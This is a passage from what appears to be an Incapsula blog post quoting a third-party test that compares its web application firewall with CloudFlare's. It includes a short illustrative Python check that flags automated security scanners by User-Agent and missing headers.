We noticed the high block ratio of XSS attacks, but from all the types of attacks, main focus was on Cross-Site Scripting. The SQL Injection, Local and Remote File Inclusion, and Remote Code/Command Execution attacks had very low detection rate by the CloudFlare WAF.

Incapsula, on the other hand, has shown consistent security performance in both tests, with a high block ratio and few false-positives.”

It was also great to see that the Incapsula fingerprinting engine triumphed:

"What’s also important to note is that Incapsula can recognize an ongoing attack and block attacker's session. We specifically noticed this during the test using automated tools such as ZAP and Burp. Their blocking mechanism seems to be based on recognizing the fingerprint of the tool being used, so even if you try to trick it by changing the default User-Agent or manipulating other header fields, the WAF will still block your session. We didn't notice such mechanism on CloudFlare's WAF. CloudFlare blocks a session only if an attacker tries to manipulate and send invalid headers"
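The blocking mechanism described in that quote can be sketched roughly as follows. The signature strings and header heuristic below are illustrative assumptions on my part, not Incapsula’s actual rules:

```python
# Toy fingerprint check in the spirit of the quoted behavior: flag a
# request that looks like an automated scanner, even when the
# User-Agent has been changed.
SCANNER_SIGNATURES = ("sqlmap", "nikto", "zap", "burp")  # illustrative

def looks_like_scanner(headers: dict) -> bool:
    ua = headers.get("User-Agent", "").lower()
    if any(sig in ua for sig in SCANNER_SIGNATURES):
        return True  # tool identified itself outright
    # Real browsers send Accept-Language; many tools omit it, so a
    # spoofed User-Agent alone is not enough to pass as a browser.
    if "Accept-Language" not in headers:
        return True
    return False
```

A production engine would combine many such signals (header ordering, TLS fingerprint, request timing) and would then block the whole session, not just the single offending request.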

Our Followup

We have worked through the findings of this report and patched the gaps exposed by the few attacks that originally got through. The Incapsula cloud WAF now stops all of the vectors specified.

 